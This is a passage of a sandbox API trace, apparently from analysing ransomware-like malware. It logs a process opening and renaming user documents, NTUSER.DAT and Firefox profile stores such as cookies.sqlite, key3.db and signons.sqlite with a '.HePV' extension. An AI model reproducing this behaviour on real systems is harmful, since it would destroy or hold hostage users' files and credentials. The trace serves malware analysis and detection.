(lpExistingFileName="c:\\users\\default\\desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), lpNewFileName="c:\\users\\default\\desktop\\desktop.ini.HePV" (normalized: "c:\\users\\default\\desktop\\desktop.ini.hepv")) returned 1 [0048.569] MoveFileW (lpExistingFileName="c:\\users\\default\\documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), lpNewFileName="c:\\users\\default\\documents\\desktop.ini.HePV" (normalized: "c:\\users\\default\\documents\\desktop.ini.hepv")) returned 1 [0048.580] MoveFileW (lpExistingFileName="c:\\users\\default\\downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), lpNewFileName="c:\\users\\default\\downloads\\desktop.ini.HePV" (normalized: "c:\\users\\default\\downloads\\desktop.ini.hepv")) returned 1 [0048.595] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), lpNewFileName="c:\\users\\default\\favorites\\desktop.ini.HePV" (normalized: "c:\\users\\default\\favorites\\desktop.ini.hepv")) returned 1 [0048.612] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), lpNewFileName="c:\\users\\default\\favorites\\links\\desktop.ini.HePV" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini.hepv")) returned 1 [0048.620] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), lpNewFileName="c:\\users\\default\\favorites\\links\\Web Slice Gallery.url.HePV" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url.hepv")) returned 1 [0048.635] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSN Autos.url.HePV" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.hepv")) returned 1 [0048.647] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSN Entertainment.url.HePV" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.hepv")) returned 1 [0048.659] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSN Money.url.HePV" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.hepv")) returned 1 [0048.914] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSN Sports.url.HePV" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.hepv")) returned 1 [0048.916] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSN.url.HePV" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.hepv")) returned 1 [0048.919] MoveFileW (lpExistingFileName="c:\\users\\default\\favorites\\msn websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="c:\\users\\default\\favorites\\msn websites\\MSNBC News.url.HePV" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.hepv")) returned 1 [0048.928] MoveFileW (lpExistingFileName="c:\\users\\default\\links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), lpNewFileName="c:\\users\\default\\links\\desktop.ini.HePV" (normalized: "c:\\users\\default\\links\\desktop.ini.hepv")) returned 1 [0048.937] MoveFileW (lpExistingFileName="c:\\users\\default\\music\\desktop.ini" (normalized: "c:\\users\\default\\music\\desktop.ini"), lpNewFileName="c:\\users\\default\\music\\desktop.ini.HePV" (normalized: "c:\\users\\default\\music\\desktop.ini.hepv")) returned 1 [0049.035] MoveFileW (lpExistingFileName="c:\\users\\default\\NTUSER.DAT" (normalized: "c:\\users\\default\\ntuser.dat"), lpNewFileName="c:\\users\\default\\NTUSER.DAT.HePV" (normalized: "c:\\users\\default\\ntuser.dat.hepv")) returned 1 [0049.056] MoveFileW (lpExistingFileName="c:\\users\\default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="c:\\users\\default\\NTUSER.DAT.LOG.HePV" (normalized: "c:\\users\\default\\ntuser.dat.log.hepv")) returned 1 [0049.059] MoveFileW (lpExistingFileName="c:\\users\\default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), lpNewFileName="c:\\users\\default\\ntuser.ini.HePV" (normalized: "c:\\users\\default\\ntuser.ini.hepv")) returned 1 [0049.066] MoveFileW (lpExistingFileName="c:\\users\\default\\pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), lpNewFileName="c:\\users\\default\\pictures\\desktop.ini.HePV" (normalized: "c:\\users\\default\\pictures\\desktop.ini.hepv")) returned 1 [0049.078] MoveFileW (lpExistingFileName="c:\\users\\default\\saved games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), lpNewFileName="c:\\users\\default\\saved games\\desktop.ini.HePV" (normalized: "c:\\users\\default\\saved games\\desktop.ini.hepv")) returned 1 [0049.089] MoveFileW (lpExistingFileName="c:\\users\\default\\searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), lpNewFileName="c:\\users\\default\\searches\\desktop.ini.HePV" (normalized: "c:\\users\\default\\searches\\desktop.ini.hepv")) returned 1 [0049.099] MoveFileW (lpExistingFileName="c:\\users\\default\\videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), lpNewFileName="c:\\users\\default\\videos\\desktop.ini.HePV" (normalized: "c:\\users\\default\\videos\\desktop.ini.hepv")) returned 1 [0049.108] MoveFileW (lpExistingFileName="c:\\users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), lpNewFileName="c:\\users\\desktop.ini.HePV" (normalized: "c:\\users\\desktop.ini.hepv")) returned 1 [0049.117] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\--TPex.swf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\--tpex.swf"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\--TPex.swf.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\--tpex.swf.hepv")) returned 1 [0049.124] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\2saZ9.docx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2saz9.docx"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\2saZ9.docx.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2saz9.docx.hepv")) returned 1 [0049.128] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\4I7KqzNu.odp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\4i7kqznu.odp"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\4I7KqzNu.odp.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\4i7kqznu.odp.hepv")) returned 1 [0049.131] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\Aij-NrrBF-zKxl.pdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\aij-nrrbf-zkxl.pdf"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\Aij-NrrBF-zKxl.pdf.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\aij-nrrbf-zkxl.pdf.hepv")) returned 1 [0049.138] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\CIea_WygQiBTWc wX.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ciea_wygqibtwc wx.jpg"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\CIea_WygQiBTWc wX.jpg.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ciea_wygqibtwc wx.jpg.hepv")) returned 1 [0049.140] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\HCS7PqsFuO_UzQ3.xls" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\hcs7pqsfuo_uzq3.xls"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\HCS7PqsFuO_UzQ3.xls.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\hcs7pqsfuo_uzq3.xls.hepv")) returned 1 [0049.146] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\kf92CZO.csv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kf92czo.csv"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\kf92CZO.csv.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kf92czo.csv.hepv")) returned 1 [0049.154] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0049.154] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0049.156] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\addons.json.hepv")) returned 1 [0049.162] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0049.162] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0049.173] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-05-31_5.json.hepv")) returned 1 [0049.184] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\bookmarkbackups\\bookmarks-2017-07-12_5.json.hepv")) returned 1 [0049.190] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0049.190] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0049.207] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cert8.db.hepv")) returned 1 [0049.209] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\compatibility.ini.hepv")) returned 1 [0049.233] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\content-prefs.sqlite.hepv")) returned 1 [0049.283] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\cookies.sqlite.hepv")) returned 1 [0049.298] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\downloads.sqlite.hepv")) returned 1 [0049.300] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.ini.hepv")) returned 1 [0049.343] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\extensions.sqlite.hepv")) returned 1 [0049.445] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\healthreport.sqlite.hepv")) returned 1 [0049.447] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0049.447] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0049.532] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.hepv")) returned 1 [0049.538] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), dwDesiredAccess=0x1, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0049.538] CreateFileW (lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), dwDesiredAccess=0x2, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0049.544] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\key3.db.hepv")) returned 1 [0049.546] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\marionette.log.hepv")) returned 1 [0049.553] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\permissions.sqlite.hepv")) returned 1 [0050.578] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\places.sqlite.hepv")) returned 1 [0050.596] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\pluginreg.dat.hepv")) returned 1 [0050.607] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\prefs.js.hepv")) returned 1 [0050.634] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\search.json.hepv")) returned 1 [0050.638] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\secmod.db.hepv")) returned 1 [0050.640] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.bak.hepv")) returned 1 [0050.645] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js.hepv")) returned 1 [0050.809] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite.hepv")) returned 1 [0050.812] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json.hepv")) returned 1 [0050.814] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt.hepv")) returned 1 [0050.832] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\webappsstore.sqlite.hepv")) returned 1 [0050.881] MoveFileW (lpExistingFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), lpNewFileName="c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.HePV" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.hepv")) returned 1 [0050.906] MoveFileW 